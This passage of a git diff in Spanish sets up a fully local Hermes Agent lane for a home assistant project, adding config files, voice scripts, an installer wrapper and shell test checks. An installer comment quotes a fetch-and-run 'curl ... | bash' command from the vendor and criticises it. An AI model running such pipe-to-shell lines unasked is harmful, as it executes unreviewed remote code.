yaml;print(yaml.safe_load(open('~/.hermes/config.yaml'))['model'])" +# +# NADA de lo de abajo saca datos de la maquina. Comprobado pieza a pieza: el +# modelo es Ollama en 127.0.0.1, la voz es Piper local, el oido es whisper +# local y la memoria es un SQLite en ~/.hermes. Cero claves, cero cuentas. + +# ── El cerebro ───────────────────────────────────────────────────────────── +# +# CORREGIDO EL 16 DE AGOSTO. Aqui ponia :4b-jarvis, el mismo modelo del naranja, +# con el argumento de que Ollama sirve una sola copia a los dos y asi los dos +# carriles caben en la GPU. El argumento era bueno y la conclusion imposible: +# +# 1. El prompt fijo de Hermes son ~20.500 tokens y el naranja va con +# num_ctx 4096. No es que rinda mal: no entra la pregunta. +# 2. Hermes RECHAZA cualquier modelo por debajo de 64.000 tokens de contexto +# (MINIMUM_CONTEXT_LENGTH en agent/model_metadata.py). Tope duro. +# +# Asi que el verde necesita modelo propio, y a 65536 no caben las 32 capas en +# 4 GB: van 16, el resto a la CPU. Los dos carriles ya NO comparten copia +# cargada β€” abrir los dos a la vez no cabe. Se abre uno u otro. +# +# context_length aqui es obligatorio: sin el, Hermes se cree lo que dice +# /api/show, que son 262144 (el maximo del modelo) y no lo configurado. +model: + default: "qwen3.5:4b-verde" + provider: "custom" + base_url: "http://127.0.0.1:11434/v1" + context_length: 65536 + +# ── Desde donde mira ─────────────────────────────────────────────────────── +# +# Este bloque se aΓ±adio el 16 de agosto y arregla un fallo que NO parecia de +# rutas. De fabrica `cwd: "."`, que la documentacion describe como "el +# directorio desde el que lanzas hermes". No lo es: el agente arrancaba +# siempre en $HOME por mucho `cd` que se hiciera delante, y `--in DIR` se +# ignora en el modo de una sola pregunta (-z sale por _run_and_exit_oneshot y +# nunca llega a cmd_chat, que es donde vive esa bandera). +# +# El sintoma: se pide "lee verde/README.md y resumelo" y contesta un resumen +# impecable del README de Gitleaks, que es el que hay en $HOME. Sin un +# solo error por ningun lado. Ver NOTAS.md. +# +# Con la raiz en $HOME ademas se ahoga: un search_files de "*.md" devolvia +# sobre todo site-packages de los venv. +terminal: + cwd: "$HOME/COFRE/CODERS/JARVIS" + +# Ollama no pide clave. Si al arrancar Hermes insiste en una, la guia oficial +# dice que vale cualquier cosa ("no-key"). No se pone aqui para que el .env +# siga sin una sola credencial. Ver NOTAS.md. + +# ── Telemetria ───────────────────────────────────────────────────────────── +# Hermes dice no recoger nada. Se apaga igualmente, que es gratis. +telemetry: + shared_metrics: + enabled: false + +# ── El oido ──────────────────────────────────────────────────────────────── +# +# faster-whisper local. `small` porque es lo que usa el naranja y comparar dos +# carriles con modelos de escucha distintos no mediria el harness, mediria el +# modelo. +# +# unload_after_idle_seconds es el ajuste que importa en esta maquina: whisper +# pide 839 MiB en el pico de una transcripcion y la tarjeta son 4096. Soltarlo +# a los 5 minutos de silencio devuelve ese hueco al modelo. Cuesta una recarga +# en la siguiente frase; a cambio, no compite con el cerebro estando parado. +stt: + enabled: true + provider: "local" + local: + model: "small" + language: "es" + unload_after_idle_seconds: 300 + +# ── La boca ──────────────────────────────────────────────────────────────── +# +# NO se usa el proveedor `piper` de Hermes, y el motivo no es capricho. +# +# El `piper` de serie se descarga sus propias voces de OHF-Voice/piper1-gpl y +# no sabe bajar el tono. Sonaria distinto al naranja, y entonces comparar las +# voces de los dos carriles no diria nada de nada. +# +# En su lugar se usa el proveedor por COMANDO (`type: command`), que existe en +# el codigo (tools/tts_tool.py, bloque "Custom command providers") aunque no +# este en la web. Eso permite llamar al mismo config/jarvis-piper.sh que usa el +# naranja: mismo binario Piper 1.2.0 (MIT), mismo modelo .onnx, mismo trato de +# audio. El verde suena EXACTAMENTE igual que el naranja. +# +# El adaptador voz-verde.sh existe porque las interfaces no encajan: Hermes +# pasa un fichero con el texto y jarvis-piper.sh espera el texto como +# argumento. Ver la cabecera de voz-verde.sh. +tts: + provider: "jarvis-piper" + providers: + jarvis-piper: + type: command + command: "$HOME/COFRE/CODERS/JARVIS/verde/voz-verde.sh {output_path} {input_path}" + output_format: wav + + # La referencia de fabrica, por si algun dia se quiere oir que da Hermes sin + # tocarlo. NO se activa: edge es un servicio de Microsoft y le manda el texto + # de cada respuesta. Seria la unica pieza no libre del carril. + # provider: "edge" + +# ── Memoria ──────────────────────────────────────────────────────────────── +# +# La que trae Hermes: SQLite con FTS5 en ~/.hermes. Local y sin instalar nada. +# Es el sustituto de Honcho (el "Hancho AI" del video), que es AGPL y se puede +# autoalojar, pero cuyo razonamiento exige clave de Gemini, Anthropic u OpenAI +# y sacaria las conversaciones de la maquina. +# +# La memoria de CONOCIMIENTO va aparte, en verde/boveda/, como ficheros de +# contexto. Ver boveda/README.md. diff --git a/verde/docs/arquitectura.svg b/verde/docs/arquitectura.svg new file mode 100644 index 0000000..6d210c3 --- /dev/null +++ b/verde/docs/arquitectura.svg @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + JARVIS Β· carril verde + Hermes Agent + β€” un arnΓ©s agΓ©ntico completo, 100 % local por configuraciΓ³n + + + TÚ + + + Voz + micro β†’ whisper local + faster-whisper Β· en CPU + + + + Texto + panel web Β· TUI + chat Β· sesiones Β· logs + + + + + HERMES AGENT + el arnΓ©s: decide, encadena, recuerda + + + 23 herramientas + + terminal + ficheros + navegador + cΓ³digo + web + delegaciΓ³n + cron + visiΓ³n Β· TTS Β· computer-use… + + + + 82 skills + (chuletas que activa cuando tocan) + + + β˜… buscar-en-apuntes β†’ tu RAG (Γ­ndice del naranja) + + ECC Β· security-review… + + github Β· research Β· devops… + + + + + + Memoriaaprende entre sesiones + + CanalestelegramΒ·discord… + + Webhooks+ cron Β· MCP + + + + + ⚠ Local por configuraciΓ³n, no por construcciΓ³n + el agente tiene terminal: puede salir a la red si lo decide. + cerebro, voz, oΓ­do y memoria sΓ­ son locales y comprobados. + + + EN TU MÁQUINA + + + Cerebro + Ollama Β· qwen3.5:4b-verde + 64k contexto Β· 127.0.0.1 + media red en GPU, media en CPU + + + + RAG + busca_cli β†’ Γ­ndice del naranja + ~19.500 entradas Β· conocimiento + + + + Voz + Piper Β· davefx + misma voz que el naranja + + + + + + + + + + + + + Todo en 127.0.0.1 Β· software libre (MIT Β· Apache-2.0) + banco de pruebas: ΒΏun arnΓ©s de fΓ‘brica supera al nΓΊcleo naranja en skills, canales y memoria? + el precio: mΓ‘s lento en un 4B. la ganancia: capacidades que el nΓΊcleo aΓΊn no tiene. + diff --git a/verde/docs/panel-chat.png b/verde/docs/panel-chat.png new file mode 100644 index 0000000..401f3f9 Binary files /dev/null and b/verde/docs/panel-chat.png differ diff --git a/verde/docs/panel-skills.png b/verde/docs/panel-skills.png new file mode 100644 index 0000000..0cc8109 Binary files /dev/null and b/verde/docs/panel-skills.png differ diff --git a/verde/env.ejemplo b/verde/env.ejemplo new file mode 100644 index 0000000..be3d156 --- /dev/null +++ b/verde/env.ejemplo @@ -0,0 +1,58 @@ +# JARVIS verde β€” plantilla del ~/.hermes/.env +# +# ESTE FICHERO NO TIENE NI UNA CLAVE, y eso es a proposito, no un descuido. +# +# El carril verde es 100 % local: el cerebro es Ollama en 127.0.0.1, la voz es +# Piper, el oido es whisper y la memoria es un SQLite. Ninguna de esas cuatro +# cosas pide credencial. Lo que hay debajo esta comentado como DOCUMENTACION +# de que habilitaria cada clave y que se llevaria fuera de la maquina, para +# que la decision sea explicita el dia que se tome y no un descubrimiento. +# +# Ademas hay un motivo mecanico para dejarlo vacio: el instalador llama a +# maybe_start_gateway(), que arranca un servicio en segundo plano SI encuentra +# un token de mensajeria aqui. Sin tokens, sale antes de hacer nada. Es lo que +# garantiza que instalar no levante nada. + +# ── El cerebro ───────────────────────────────────────────────────────────── +# +# Ollama no pide clave. Si Hermes insistiera en una para el proveedor +# "custom", la guia oficial dice que sirve cualquier cosa: +# OPENAI_API_KEY=no-key + +# Modelos locales lentos: el limite por defecto se queda corto en CPU. +# En esta maquina el 4b va en GPU y no hace falta, pero si algun dia se prueba +# un modelo grande contra los 62 GB de RAM, esto es lo que evita el corte. +# HERMES_API_TIMEOUT=1800 + +# ── Voz ──────────────────────────────────────────────────────────────────── +# +# ELEVENLABS_API_KEY hablar y oir por ElevenLabs. +# Saca el TEXTO de cada respuesta (TTS) y el AUDIO de tu +# microfono (STT). Desde 6 $/mes para uso comercial. +# Descartado: Piper hace lo mismo aqui y es MIT. +# +# GROQ_API_KEY oir por Groq. Tier gratuito y mas rapido que local, +# pero manda el audio crudo de tu microfono fuera. + +# ── Memoria ──────────────────────────────────────────────────────────────── +# +# HONCHO_API_KEY el "Hancho AI" del video, que en realidad es Honcho, de +# Plastic Labs. Perfilado del usuario por pasadas de +# razonamiento. 2 $/M tokens mas 0,001-0,50 $ por consulta. +# Es AGPL-3.0 y se puede autoalojar con docker compose y +# PostgreSQL+pgvector, PERO su razonamiento exige clave de +# Gemini, Anthropic u OpenAI: autoalojarlo daria el codigo +# libre y seguiria sacando las conversaciones. +# Descartado. La memoria es el SQLite de Hermes. + +# ── Canales ──────────────────────────────────────────────────────────────── +# +# CUIDADO: poner cualquiera de estos hace que el instalador OFREZCA levantar +# el gateway como servicio de systemd. Mientras el verde sea un banco de +# pruebas, se quedan fuera. +# +# TELEGRAM_BOT_TOKEN +# DISCORD_BOT_TOKEN +# SLACK_BOT_TOKEN +# SLACK_APP_TOKEN +# WHATSAPP_ENABLED diff --git a/verde/escucha-verde.sh b/verde/escucha-verde.sh new file mode 100755 index 0000000..b62d9a1 --- /dev/null +++ b/verde/escucha-verde.sh @@ -0,0 +1,84 @@ +#!/usr/bin/env bash +# El oido del verde: micro -> whisper LOCAL -> el agente. Nada sale de la maquina. +# +# ./escucha-verde.sh pulsar-para-hablar: graba, para con Enter, responde +# ./escucha-verde.sh --habla ademas dice la respuesta en voz alta (voz del verde) +# ./escucha-verde.sh --seguido no para: encadena turnos hasta Ctrl-C +# +# Por que existe: el TUI de Hermes no tiene microfono, y su STT nativo transcribe +# notas de voz de mensajeria (Telegram/Discord), que saldrian de la maquina. Este +# puente graba en local (pw-record/parec/arecord), transcribe con faster-whisper +# 'small' (escucha_transcribe.py, en CPU) y se lo pasa al agente con `hermes chat`. +# +# AVISO honesto: el 4B verde con 65k de contexto y media red en CPU tarda minutos +# por turno. Esto sirve para PROBAR que el verde escucha, no como asistente de +# diario: para eso esta el naranja. La palanca de velocidad (KV cache q8_0) toca +# el servicio de ollama y afectaria al naranja, asi que no se aplica aqui. +set -uo pipefail + +RAIZ=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")/.." && pwd) +VERDE=$RAIZ/verde +PY=$RAIZ/nucleo/venv/bin/python +[ -x "$PY" ] || PY=$(command -v python3) +HERMES="$HOME/.hermes/hermes-agent/venv/bin/python $HOME/.hermes/hermes-agent/hermes" +TMP=${TMPDIR:-/tmp}/jarvis-verde-escucha +mkdir -p "$TMP" + +HABLA=0; SEGUIDO=0 +for a in "$@"; do + case "$a" in + --habla) HABLA=1 ;; + --seguido) SEGUIDO=1 ;; + esac +done + +verde() { printf '\033[32m%s\033[0m\n' "$1"; } +gris() { printf '\033[90m%s\033[0m\n' "$1"; } + +# Devuelve el comando de grabacion a WAV 16 kHz mono, segun lo que haya. +grabador_a() { + local wav=$1 + if command -v pw-record >/dev/null; then echo "pw-record --rate 16000 --channels 1 --format s16 $wav" ;; + elif command -v arecord >/dev/null; then echo "arecord -q -r 16000 -c 1 -f S16_LE -t wav $wav" ;; + elif command -v parec >/dev/null; then echo "parec --rate=16000 --channels=1 --format=s16le --file-format=wav $wav" ;; + else echo ""; fi +} + +un_turno() { + local wav=$TMP/turno.wav; rm -f "$wav" + local cmd; cmd=$(grabador_a "$wav") + if [ -z "$cmd" ]; then + echo "No hay grabador (instala pipewire-utils, alsa-utils o pulseaudio-utils)"; return 1 + fi + verde "πŸŽ™ Habla ahora... (Enter para parar)" + $cmd >/dev/null 2>&1 & + local pid=$! + read -r _ /dev/null; wait "$pid" 2>/dev/null + [ -s "$wav" ] || { echo "no se grabo nada"; return 1; } + + gris "…transcribiendo (local)…" + local texto; texto=$("$PY" "$VERDE/escucha_transcribe.py" "$wav" 2>/dev/null) + if [ -z "$texto" ]; then echo "no se entendio nada"; return 1; fi + printf '\033[36m> %s\033[0m\n' "$texto" + + gris "…pensando (4B verde, puede tardar)…" + local resp; resp=$($HERMES chat --reasoning none -q "$texto" 2>/dev/null) + printf '\033[32m%s\033[0m\n' "$resp" + + if [ "$HABLA" = 1 ] && [ -n "$resp" ]; then + local txt=$TMP/resp.txt wavr=$TMP/resp.wav + printf '%s' "$resp" > "$txt" + "$VERDE/voz-verde.sh" "$wavr" "$txt" >/dev/null 2>&1 && { + command -v pw-play >/dev/null && pw-play "$wavr" 2>/dev/null || \ + command -v aplay >/dev/null && aplay -q "$wavr" 2>/dev/null || true + } + fi +} + +if [ "$SEGUIDO" = 1 ]; then + echo "Modo seguido. Ctrl-C para salir." + while true; do un_turno || true; echo; done +else + un_turno +fi diff --git a/verde/escucha_transcribe.py b/verde/escucha_transcribe.py new file mode 100755 index 0000000..e62fef1 --- /dev/null +++ b/verde/escucha_transcribe.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +"""Transcribe un WAV a texto con faster-whisper local. Nada sale de la maquina. + + escucha_transcribe.py fichero.wav + +Es la mitad "oido" del puente de voz del verde: el TUI de Hermes no tiene micro, +asi que grabamos aparte (escucha-verde.sh) y transcribimos aqui, en local, con el +mismo faster-whisper 'small' en espanol que usa el STT de Hermes. En CPU a +proposito: el 4B ocupa la tarjeta y el margen de VRAM es de 223 MiB; whisper en +CPU tarda un par de segundos mas y no arriesga un out-of-memory. +""" +import os +import sys + +MODELO = os.environ.get("VERDE_WHISPER_MODELO", "small") +IDIOMA = os.environ.get("VERDE_WHISPER_IDIOMA", "es") + +_modelo = None + + +def carga(): + global _modelo + if _modelo is None: + from faster_whisper import WhisperModel + # int8 en CPU: rapido y sin tocar la VRAM del modelo del agente. + _modelo = WhisperModel(MODELO, device="cpu", compute_type="int8") + return _modelo + + +def transcribe(ruta_wav): + m = carga() + segmentos, _ = m.transcribe( + ruta_wav, language=IDIOMA, + vad_filter=True, # el silencio no llega a whisper + vad_parameters={"min_silence_duration_ms": 500}, + ) + return " ".join(s.text.strip() for s in segmentos).strip() + + +def main(): + if len(sys.argv) < 2 or not os.path.exists(sys.argv[1]): + print("uso: escucha_transcribe.py fichero.wav", file=sys.stderr) + return 2 + print(transcribe(sys.argv[1])) + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/verde/instalar.sh b/verde/instalar.sh new file mode 100755 index 0000000..727e7e8 --- /dev/null +++ b/verde/instalar.sh @@ -0,0 +1,79 @@ +#!/usr/bin/env bash +# Instala Hermes Agent para el carril verde. NO arranca nada. +# +# ./instalar.sh instala +# ./instalar.sh --revisar solo baja el instalador y te lo enseΓ±a +# +# ── Por que un envoltorio y no el curl del video ──────────────────────────── +# +# El video (y la web de Nous) dicen: +# +# curl -fsSL https://hermes-agent.nousresearch.com/install.sh | bash +# +# Eso ejecuta 3469 lineas que nadie ha leido, con sudo por medio, en una +# maquina que tiene COFRE dentro. Aqui se baja a fichero, se queda en el repo +# junto a su sha256, y se ejecuta desde disco. Cuesta diez segundos y a cambio +# el instalador es auditable y comparable entre versiones. +# +# ── Que se le pasa, y por que ────────────────────────────────────────────── +# +# --skip-setup El asistente interactivo pide proveedor y clave por /dev/tty. +# No se quiere: la configuracion se escribe a mano en +# config.yaml, que queda versionada y explicada. Ademas el +# asistente es lo unico del instalador que pediria credenciales. +# +# Chromium SI se instala (no se pasa --skip-browser): son ~400 MB pero deja el +# paso 7 del video listo sin reinstalar nada. +# +# ── Que NO hace, comprobado leyendo el codigo ────────────────────────────── +# +# main() llama a maybe_start_gateway(), que suena a que arranca algo. No lo +# hace: sale con `return 0` si no encuentra un token de mensajeria en +# $HERMES_HOME/.env. Como el .env se deja vacio, nunca llega a preguntar. +# Por eso env.ejemplo NO se copia con los tokens descomentados. +# +# El sudo solo se usa para paquetes de sistema de apt. En esta maquina gcc, +# python3-dev, libffi-dev y build-essential ya estaban, asi que lo unico que +# pidio fue Playwright, lo declino y degrado solo: instala Chromium en la cache +# del usuario e imprime el comando que un administrador puede correr luego. +set -uo pipefail + +AQUI=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")" && pwd) +URL=https://hermes-agent.nousresearch.com/install.sh +SCRIPT=$AQUI/install-oficial.sh +LOG=$AQUI/instalacion.log + +echo "Bajando el instalador oficial..." +curl -fsSL "$URL" -o "$SCRIPT" || { echo "no se pudo bajar"; exit 1; } +chmod +x "$SCRIPT" + +echo +echo " lineas: $(wc -l < "$SCRIPT")" +echo " sha256: $(sha256sum "$SCRIPT" | cut -d' ' -f1)" +echo + +if [ "${1:-}" = "--revisar" ]; then + echo "Bajado en $SCRIPT. Lee y vuelve sin --revisar." + exit 0 +fi + +echo "Instalando (tarda: ~1,5 GB de PyPI y ~400 MB de Chromium)..." +bash "$SCRIPT" --skip-setup 2>&1 | tee "$LOG" + +echo +echo "Instalado. NO se ha arrancado nada." +echo +echo "La configuracion NO se copia encima: el instalador deja un config.yaml de" +echo "1890 lineas con su documentacion dentro, y machacarlo la perderia. Se" +echo "editan a mano los bloques model, stt y tts. Cuales y por que, en:" +echo " $AQUI/config.yaml" +echo +echo "Y OJO: ese fichero declara provider y base_url dos veces dentro de" +echo "model:. En YAML gana la ultima. Comprueba PARSEANDO, no leyendo:" +echo " python3 -c \"import yaml;print(yaml.safe_load(open('\$HOME/.hermes/config.yaml'))['model'])\"" +echo +echo "El .env del instalador ya viene sin claves. Que habilitaria cada una:" +echo " $AQUI/env.ejemplo" +echo +echo "Comprobacion en frio, no arranca nada:" +echo " $AQUI/verde-launcher.sh --status" diff --git a/verde/jarvis-verde.svg b/verde/jarvis-verde.svg new file mode 100644 index 0000000..7f4e5e5 --- /dev/null +++ b/verde/jarvis-verde.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/verde/panel-verde.sh b/verde/panel-verde.sh new file mode 100644 index 0000000..8b96013 --- /dev/null +++ b/verde/panel-verde.sh @@ -0,0 +1,58 @@ +#!/usr/bin/env bash +# El frontal del verde: el dashboard web de Hermes en una ventana propia, como el +# panel del naranja (chromium --app). Local, en 127.0.0.1, sin cuenta en la nube. +# +# ./panel-verde.sh arranca el dashboard y lo abre en su ventana +# ./panel-verde.sh --solo-servir solo levanta el servidor y dice la URL +# ./panel-verde.sh --stop para el dashboard +# +# El dashboard trae chat, config y sesiones. Es el equivalente al panel del +# naranja: una pΓ‘gina local abierta con `chromium --app`, sin barra ni pestaΓ±as, +# con su propio icono en la barra de tareas. NO se registra en Nous Portal (eso +# atarΓ­a el panel a la nube); se usa tal cual en loopback. +set -uo pipefail + +RAIZ=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")/.." && pwd) +HERMES="$HOME/.hermes/hermes-agent/venv/bin/python $HOME/.hermes/hermes-agent/hermes" +PUERTO=${VERDE_PANEL_PUERTO:-9119} +URL="http://127.0.0.1:$PUERTO/" +PERFIL=${XDG_CACHE_HOME:-$HOME/.cache}/jarvis-verde-panel +CLASE=jarvis-verde + +if [ "${1:-}" = "--stop" ]; then + $HERMES dashboard --port "$PUERTO" --stop 2>/dev/null + echo "dashboard del verde parado" + exit 0 +fi + +# Arrancar el dashboard si no responde ya. +if [ "$(curl -s -o /dev/null -w '%{http_code}' "${URL}healthz" 2>/dev/null)" != "200" ]; then + echo "arrancando el dashboard en $URL ..." + nohup $HERMES dashboard --port "$PUERTO" --host 127.0.0.1 --no-open \ + >"${TMPDIR:-/tmp}/jarvis-verde-dashboard.log" 2>&1 & + for _ in $(seq 1 30); do + sleep 2 + [ "$(curl -s -o /dev/null -w '%{http_code}' "${URL}healthz" 2>/dev/null)" = "200" ] && break + done +fi + +if [ "$(curl -s -o /dev/null -w '%{http_code}' "${URL}healthz" 2>/dev/null)" != "200" ]; then + echo "el dashboard no levantΓ³; mira ${TMPDIR:-/tmp}/jarvis-verde-dashboard.log" >&2 + exit 1 +fi +echo "dashboard listo en $URL" + +[ "${1:-}" = "--solo-servir" ] && exit 0 + +# Abrirlo como aplicaciΓ³n, igual que el panel del naranja. +for navegador in chromium chromium-browser google-chrome brave-browser; do + command -v "$navegador" >/dev/null || continue + exec "$navegador" --app="$URL" --user-data-dir="$PERFIL" --class="$CLASE" \ + --window-size=1500,940 --no-first-run --no-default-browser-check \ + --disable-features=TranslateUI >/dev/null 2>&1 +done +if command -v firefox >/dev/null; then + echo "sin chromium: se abre en Firefox, con su barra" >&2 + exec firefox --new-window "$URL" >/dev/null 2>&1 +fi +echo "no hay navegador; abre a mano: $URL" >&2 diff --git a/verde/pruebas/01_gpu.sh b/verde/pruebas/01_gpu.sh new file mode 100755 index 0000000..fe0448f --- /dev/null +++ b/verde/pruebas/01_gpu.sh @@ -0,0 +1,74 @@ +#!/usr/bin/env bash +# La tarjeta, y quien la esta usando. +# +# Va la primera porque es la que explica los fallos de las demas. En 4 GB no +# caben el verde y el naranja a la vez: si el naranja esta cargado, el verde +# dara "cudaMalloc failed" y parecera que el modelo esta roto cuando lo que +# pasa es que no hay sitio. +# +# El caso que mas ha costado en este proyecto es whisper-server: lo lanza +# flatpak-spawn --host, vive FUERA del sandbox y no se entera de que la app +# cerro. Cada reinicio deja uno agarrado a ~850 MiB. Dos o tres y ya no cabe +# nada. Por eso se cuentan, no solo se mira si hay alguno. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "La tarjeta" + +USADA=$(vram) +if [ -z "$USADA" ]; then + echo " $(rojo FALLO) no hay nvidia-smi: esto necesita la grafica" + exit 1 +fi + +TOTAL=$(nvidia-smi --query-gpu=memory.total --format=csv,noheader | tr -d ' MiB') +nota "$USADA MiB usados de $TOTAL" +nvidia-smi --query-compute-apps=used_memory,process_name --format=csv,noheader 2>/dev/null \ + | sed 's/^/ /' + +titulo "Nadie compitiendo por ella" + +# pgrep -c YA imprime 0 cuando no encuentra nada, y ademas devuelve 1. Un +# "|| echo 0" detras parece prudente y lo que hace es imprimir DOS ceros, que +# no son iguales a "0" y hacen fallar una prueba que en realidad pasa. +cuantos() { local n; n=$(pgrep -cf "$1" 2>/dev/null); echo "${n:-0}"; } +cuantos_x() { local n; n=$(pgrep -cx "$1" 2>/dev/null); echo "${n:-0}"; } + +# dataset.py genera pares con el NARANJA: mientras corra, ollama recarga el +# modelo naranja en segundos aunque se le haga stop. No es un fallo de ollama. +comprueba "dataset.py no esta corriendo" "$(cuantos 'entrena/dataset.py')" "0" + +comprueba "el nucleo naranja no esta corriendo" "$(cuantos 'nucleo/jarvis.py')" "0" + +comprueba "sin whisper-server huerfanos" "$(cuantos_x whisper-server)" "0" + +CARGADO=$(curl -fsS --max-time 5 "$OLLAMA/api/ps" 2>/dev/null | python3 -c " +import json, sys +try: m = json.load(sys.stdin).get('models', []) +except Exception: m = [] +print(','.join(x['name'] for x in m) or 'ninguno') +" 2>/dev/null) +nota "en ollama ahora: $CARGADO" + +case "$CARGADO" in + *"$NARANJA"*) + echo " $(rojo FALLO) el naranja esta cargado: no cabe el verde encima" + echo " $(gris "ollama stop $NARANJA")" + _fallo=$((_fallo + 1)) ;; + *) + echo " $(verde OK) el naranja no ocupa la tarjeta" + _ok=$((_ok + 1)) ;; +esac + +# Sitio para el verde: 2795 MiB medidos el 16 ago a num_ctx 65536 con 16 de 32 +# capas en GPU. La cifra anterior (3301) era la del modelo a 24576 con las 32 +# capas dentro, que Hermes rechaza por su suelo de 64k. +# +# Si el modelo ya esta dentro, la comprobacion no aplica: el hueco ya se uso. +case "$CARGADO" in + *"$MODELO"*) nota "el verde ya esta cargado, no hace falta hueco" ;; + *) mayor_que "queda hueco para el verde (MiB libres)" \ + "$((TOTAL - USADA))" 2800 ;; +esac + +resumen diff --git a/verde/pruebas/02_modelo.sh b/verde/pruebas/02_modelo.sh new file mode 100755 index 0000000..9b260f4 --- /dev/null +++ b/verde/pruebas/02_modelo.sh @@ -0,0 +1,62 @@ +#!/usr/bin/env bash +# Los dos modelos: que el verde tenga lo suyo y que el naranja siga intacto. +# +# La segunda mitad importa tanto como la primera. El verde es un banco de +# pruebas y el naranja es lo que el usuario usa a diario: si tocar uno estropea +# el otro, el experimento sale caro. Los cuatro parametros del naranja +# (num_ctx 4096, num_gpu 24, num_predict 300, temperature 0.4) estan medidos y +# elegidos β€”el num_gpu 24 deja 1540 MiB para whisperβ€” asi que se comprueban uno +# a uno y no "existe el modelo". +# +# Se pregunta a ollama, no al .Modelfile del repo: arrancar.sh RECREA el verde +# mientras busca el techo de contexto, asi que el fichero es la intencion y +# ollama es lo que se va a cargar de verdad. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "El verde" + +if ! ollama list 2>/dev/null | grep -q "^$MODELO"; then + echo " $(rojo FALLO) no existe $MODELO" + echo " $(gris "creado por: verde/arrancar.sh, o a mano con qwen3.5-4b-verde.Modelfile")" + exit 1 +fi +echo " $(verde OK) $MODELO existe"; _ok=$((_ok + 1)) + +CTX=$(parametro "$MODELO" num_ctx) +nota "num_ctx $CTX" + +# El suelo NO lo pone la tarjeta ni el tamaΓ±o del prompt: lo pone Hermes, que +# rechaza de plano cualquier modelo por debajo de 64.000 tokens +# (agent/model_metadata.py:405, comprobado en agent/agent_init.py:2656). +# +# Esta comprobacion existe porque el carril se dimensiono entero para 24576 +# β€”lo maximo que cabia en la GPU con las 32 capas dentroβ€” y ese numero, que +# era correcto en todo lo demas, es rechazado antes de la primera frase. En +# frio no se veia: solo salta al abrir Hermes. +mayor_que "num_ctx llega al suelo de 64k que exige Hermes" "$CTX" 63999 + +# 300 tokens β€”lo que hereda el naranja del modelo baseβ€” cortan el JSON de una +# tool call por la mitad. Es el tope escondido que casi hace concluir que el 4B +# no sabe llamar herramientas. +mayor_que "num_predict da para una tool call entera" \ + "$(parametro "$MODELO" num_predict)" 1024 + +# Emitir JSON no es escribir prosa: temperatura baja. +menor_que "temperature baja para emitir JSON" \ + "$(parametro "$MODELO" temperature)" 0.5 + +titulo "El naranja, sin tocar" + +comprueba "num_ctx del naranja" "$(parametro "$NARANJA" num_ctx)" "4096" +comprueba "num_gpu del naranja" "$(parametro "$NARANJA" num_gpu)" "24" +comprueba "num_predict del naranja" "$(parametro "$NARANJA" num_predict)" "300" +comprueba "temperature del naranja" "$(parametro "$NARANJA" temperature)" "0.4" + +# Los dos salen del mismo blob de pesos: si dejaran de compartirlo, alguien +# habria bajado un modelo distinto y las comparaciones no valdrian. +BLOB_V=$(ollama show --modelfile "$MODELO" 2>/dev/null | awk '$1=="FROM"{print $2; exit}') +BLOB_N=$(ollama show --modelfile "$NARANJA" 2>/dev/null | awk '$1=="FROM"{print $2; exit}') +comprueba "los dos carriles usan los mismos pesos" "$BLOB_V" "$BLOB_N" + +resumen diff --git a/verde/pruebas/03_config.sh b/verde/pruebas/03_config.sh new file mode 100755 index 0000000..c3bfc5d --- /dev/null +++ b/verde/pruebas/03_config.sh @@ -0,0 +1,136 @@ +#!/usr/bin/env bash +# La configuracion de Hermes, PARSEADA. +# +# Esta prueba existe por un fallo concreto que casi cuela. El config.yaml que +# genera el instalador declara `provider` y `base_url` DOS VECES dentro del +# bloque model:, una arriba y otra ~45 lineas mas abajo. En YAML gana la ultima. +# Al configurar Ollama en las de arriba el fichero PARECIA correcto leyendolo, y +# al parsearlo salia provider=auto, base_url=https://openrouter.ai/api/v1: el +# carril habria salido por OpenRouter creyendo nosotros que iba a localhost. +# +# Con 1890 lineas y 121 activas, leer el fichero no demuestra nada. Aqui todo se +# comprueba con yaml.safe_load, que es lo mismo que hace Hermes al arrancar. + +cd "$(dirname "$0")" && . ./comun.sh + +titulo "El cerebro" + +afirma "existe $CONFIG" test -f "$CONFIG" + +comprueba "el modelo por defecto es el verde" "$(config_model default)" "$MODELO" + +# Sin esto Hermes se cree lo que dice /api/show, que son 262144 β€”el maximo del +# modeloβ€” y no los 24576 configurados. El sintoma serian respuestas truncadas y +# llamadas rotas, y la conclusion natural ("el 4B no vale") seria falsa. +CTX_YAML=$(config_model context_length) +CTX_REAL=$(parametro "$MODELO" num_ctx) +comprueba "Hermes sabe el contexto REAL, no el que reporta /api/show" \ + "$CTX_YAML" "$CTX_REAL" + +# Los dos numeros tienen que ser iguales Y llegar al suelo de 64k. Poner aqui +# 65536 con el modelo a 24576 pasaria el arranque y romperia en marcha: Hermes +# no comprimiria hasta acercarse a 64k y ollama iria tirando los tokens mas +# viejos, que son el prompt de sistema y los esquemas de las herramientas. El +# agente dejaria de llamar herramientas a mitad de sesion, sin un solo error. +mayor_que "y ese contexto llega al suelo de Hermes" "${CTX_YAML:-0}" 63999 + +BASE=$(config_model base_url) +case "$BASE" in + http://127.0.0.1:*|http://localhost:*) + echo " $(verde OK) el cerebro apunta a esta maquina ($BASE)"; _ok=$((_ok + 1)) ;; + *) + echo " $(rojo FALLO) base_url NO es local: $BASE"; _fallo=$((_fallo + 1)) ;; +esac + +titulo "Cero nube" + +# Se recorre el YAML entero, no solo el bloque model:. Cualquier http(s) que no +# apunte al propio equipo es una salida potencial y tiene que estar justificada. +FUERA=$(python3 - "$CONFIG" <<'PY' +import re, sys, yaml + +LOCAL = re.compile(r'^https?://(127\.0\.0\.1|localhost|0\.0\.0\.0|\[::1\])') +URL = re.compile(r'https?://[^\s"\']+') +fuera = [] + +def anda(nodo, ruta=""): + if isinstance(nodo, dict): + for k, v in nodo.items(): + anda(v, f"{ruta}.{k}" if ruta else str(k)) + elif isinstance(nodo, list): + for i, v in enumerate(nodo): + anda(v, f"{ruta}[{i}]") + elif isinstance(nodo, str): + for u in URL.findall(nodo): + if not 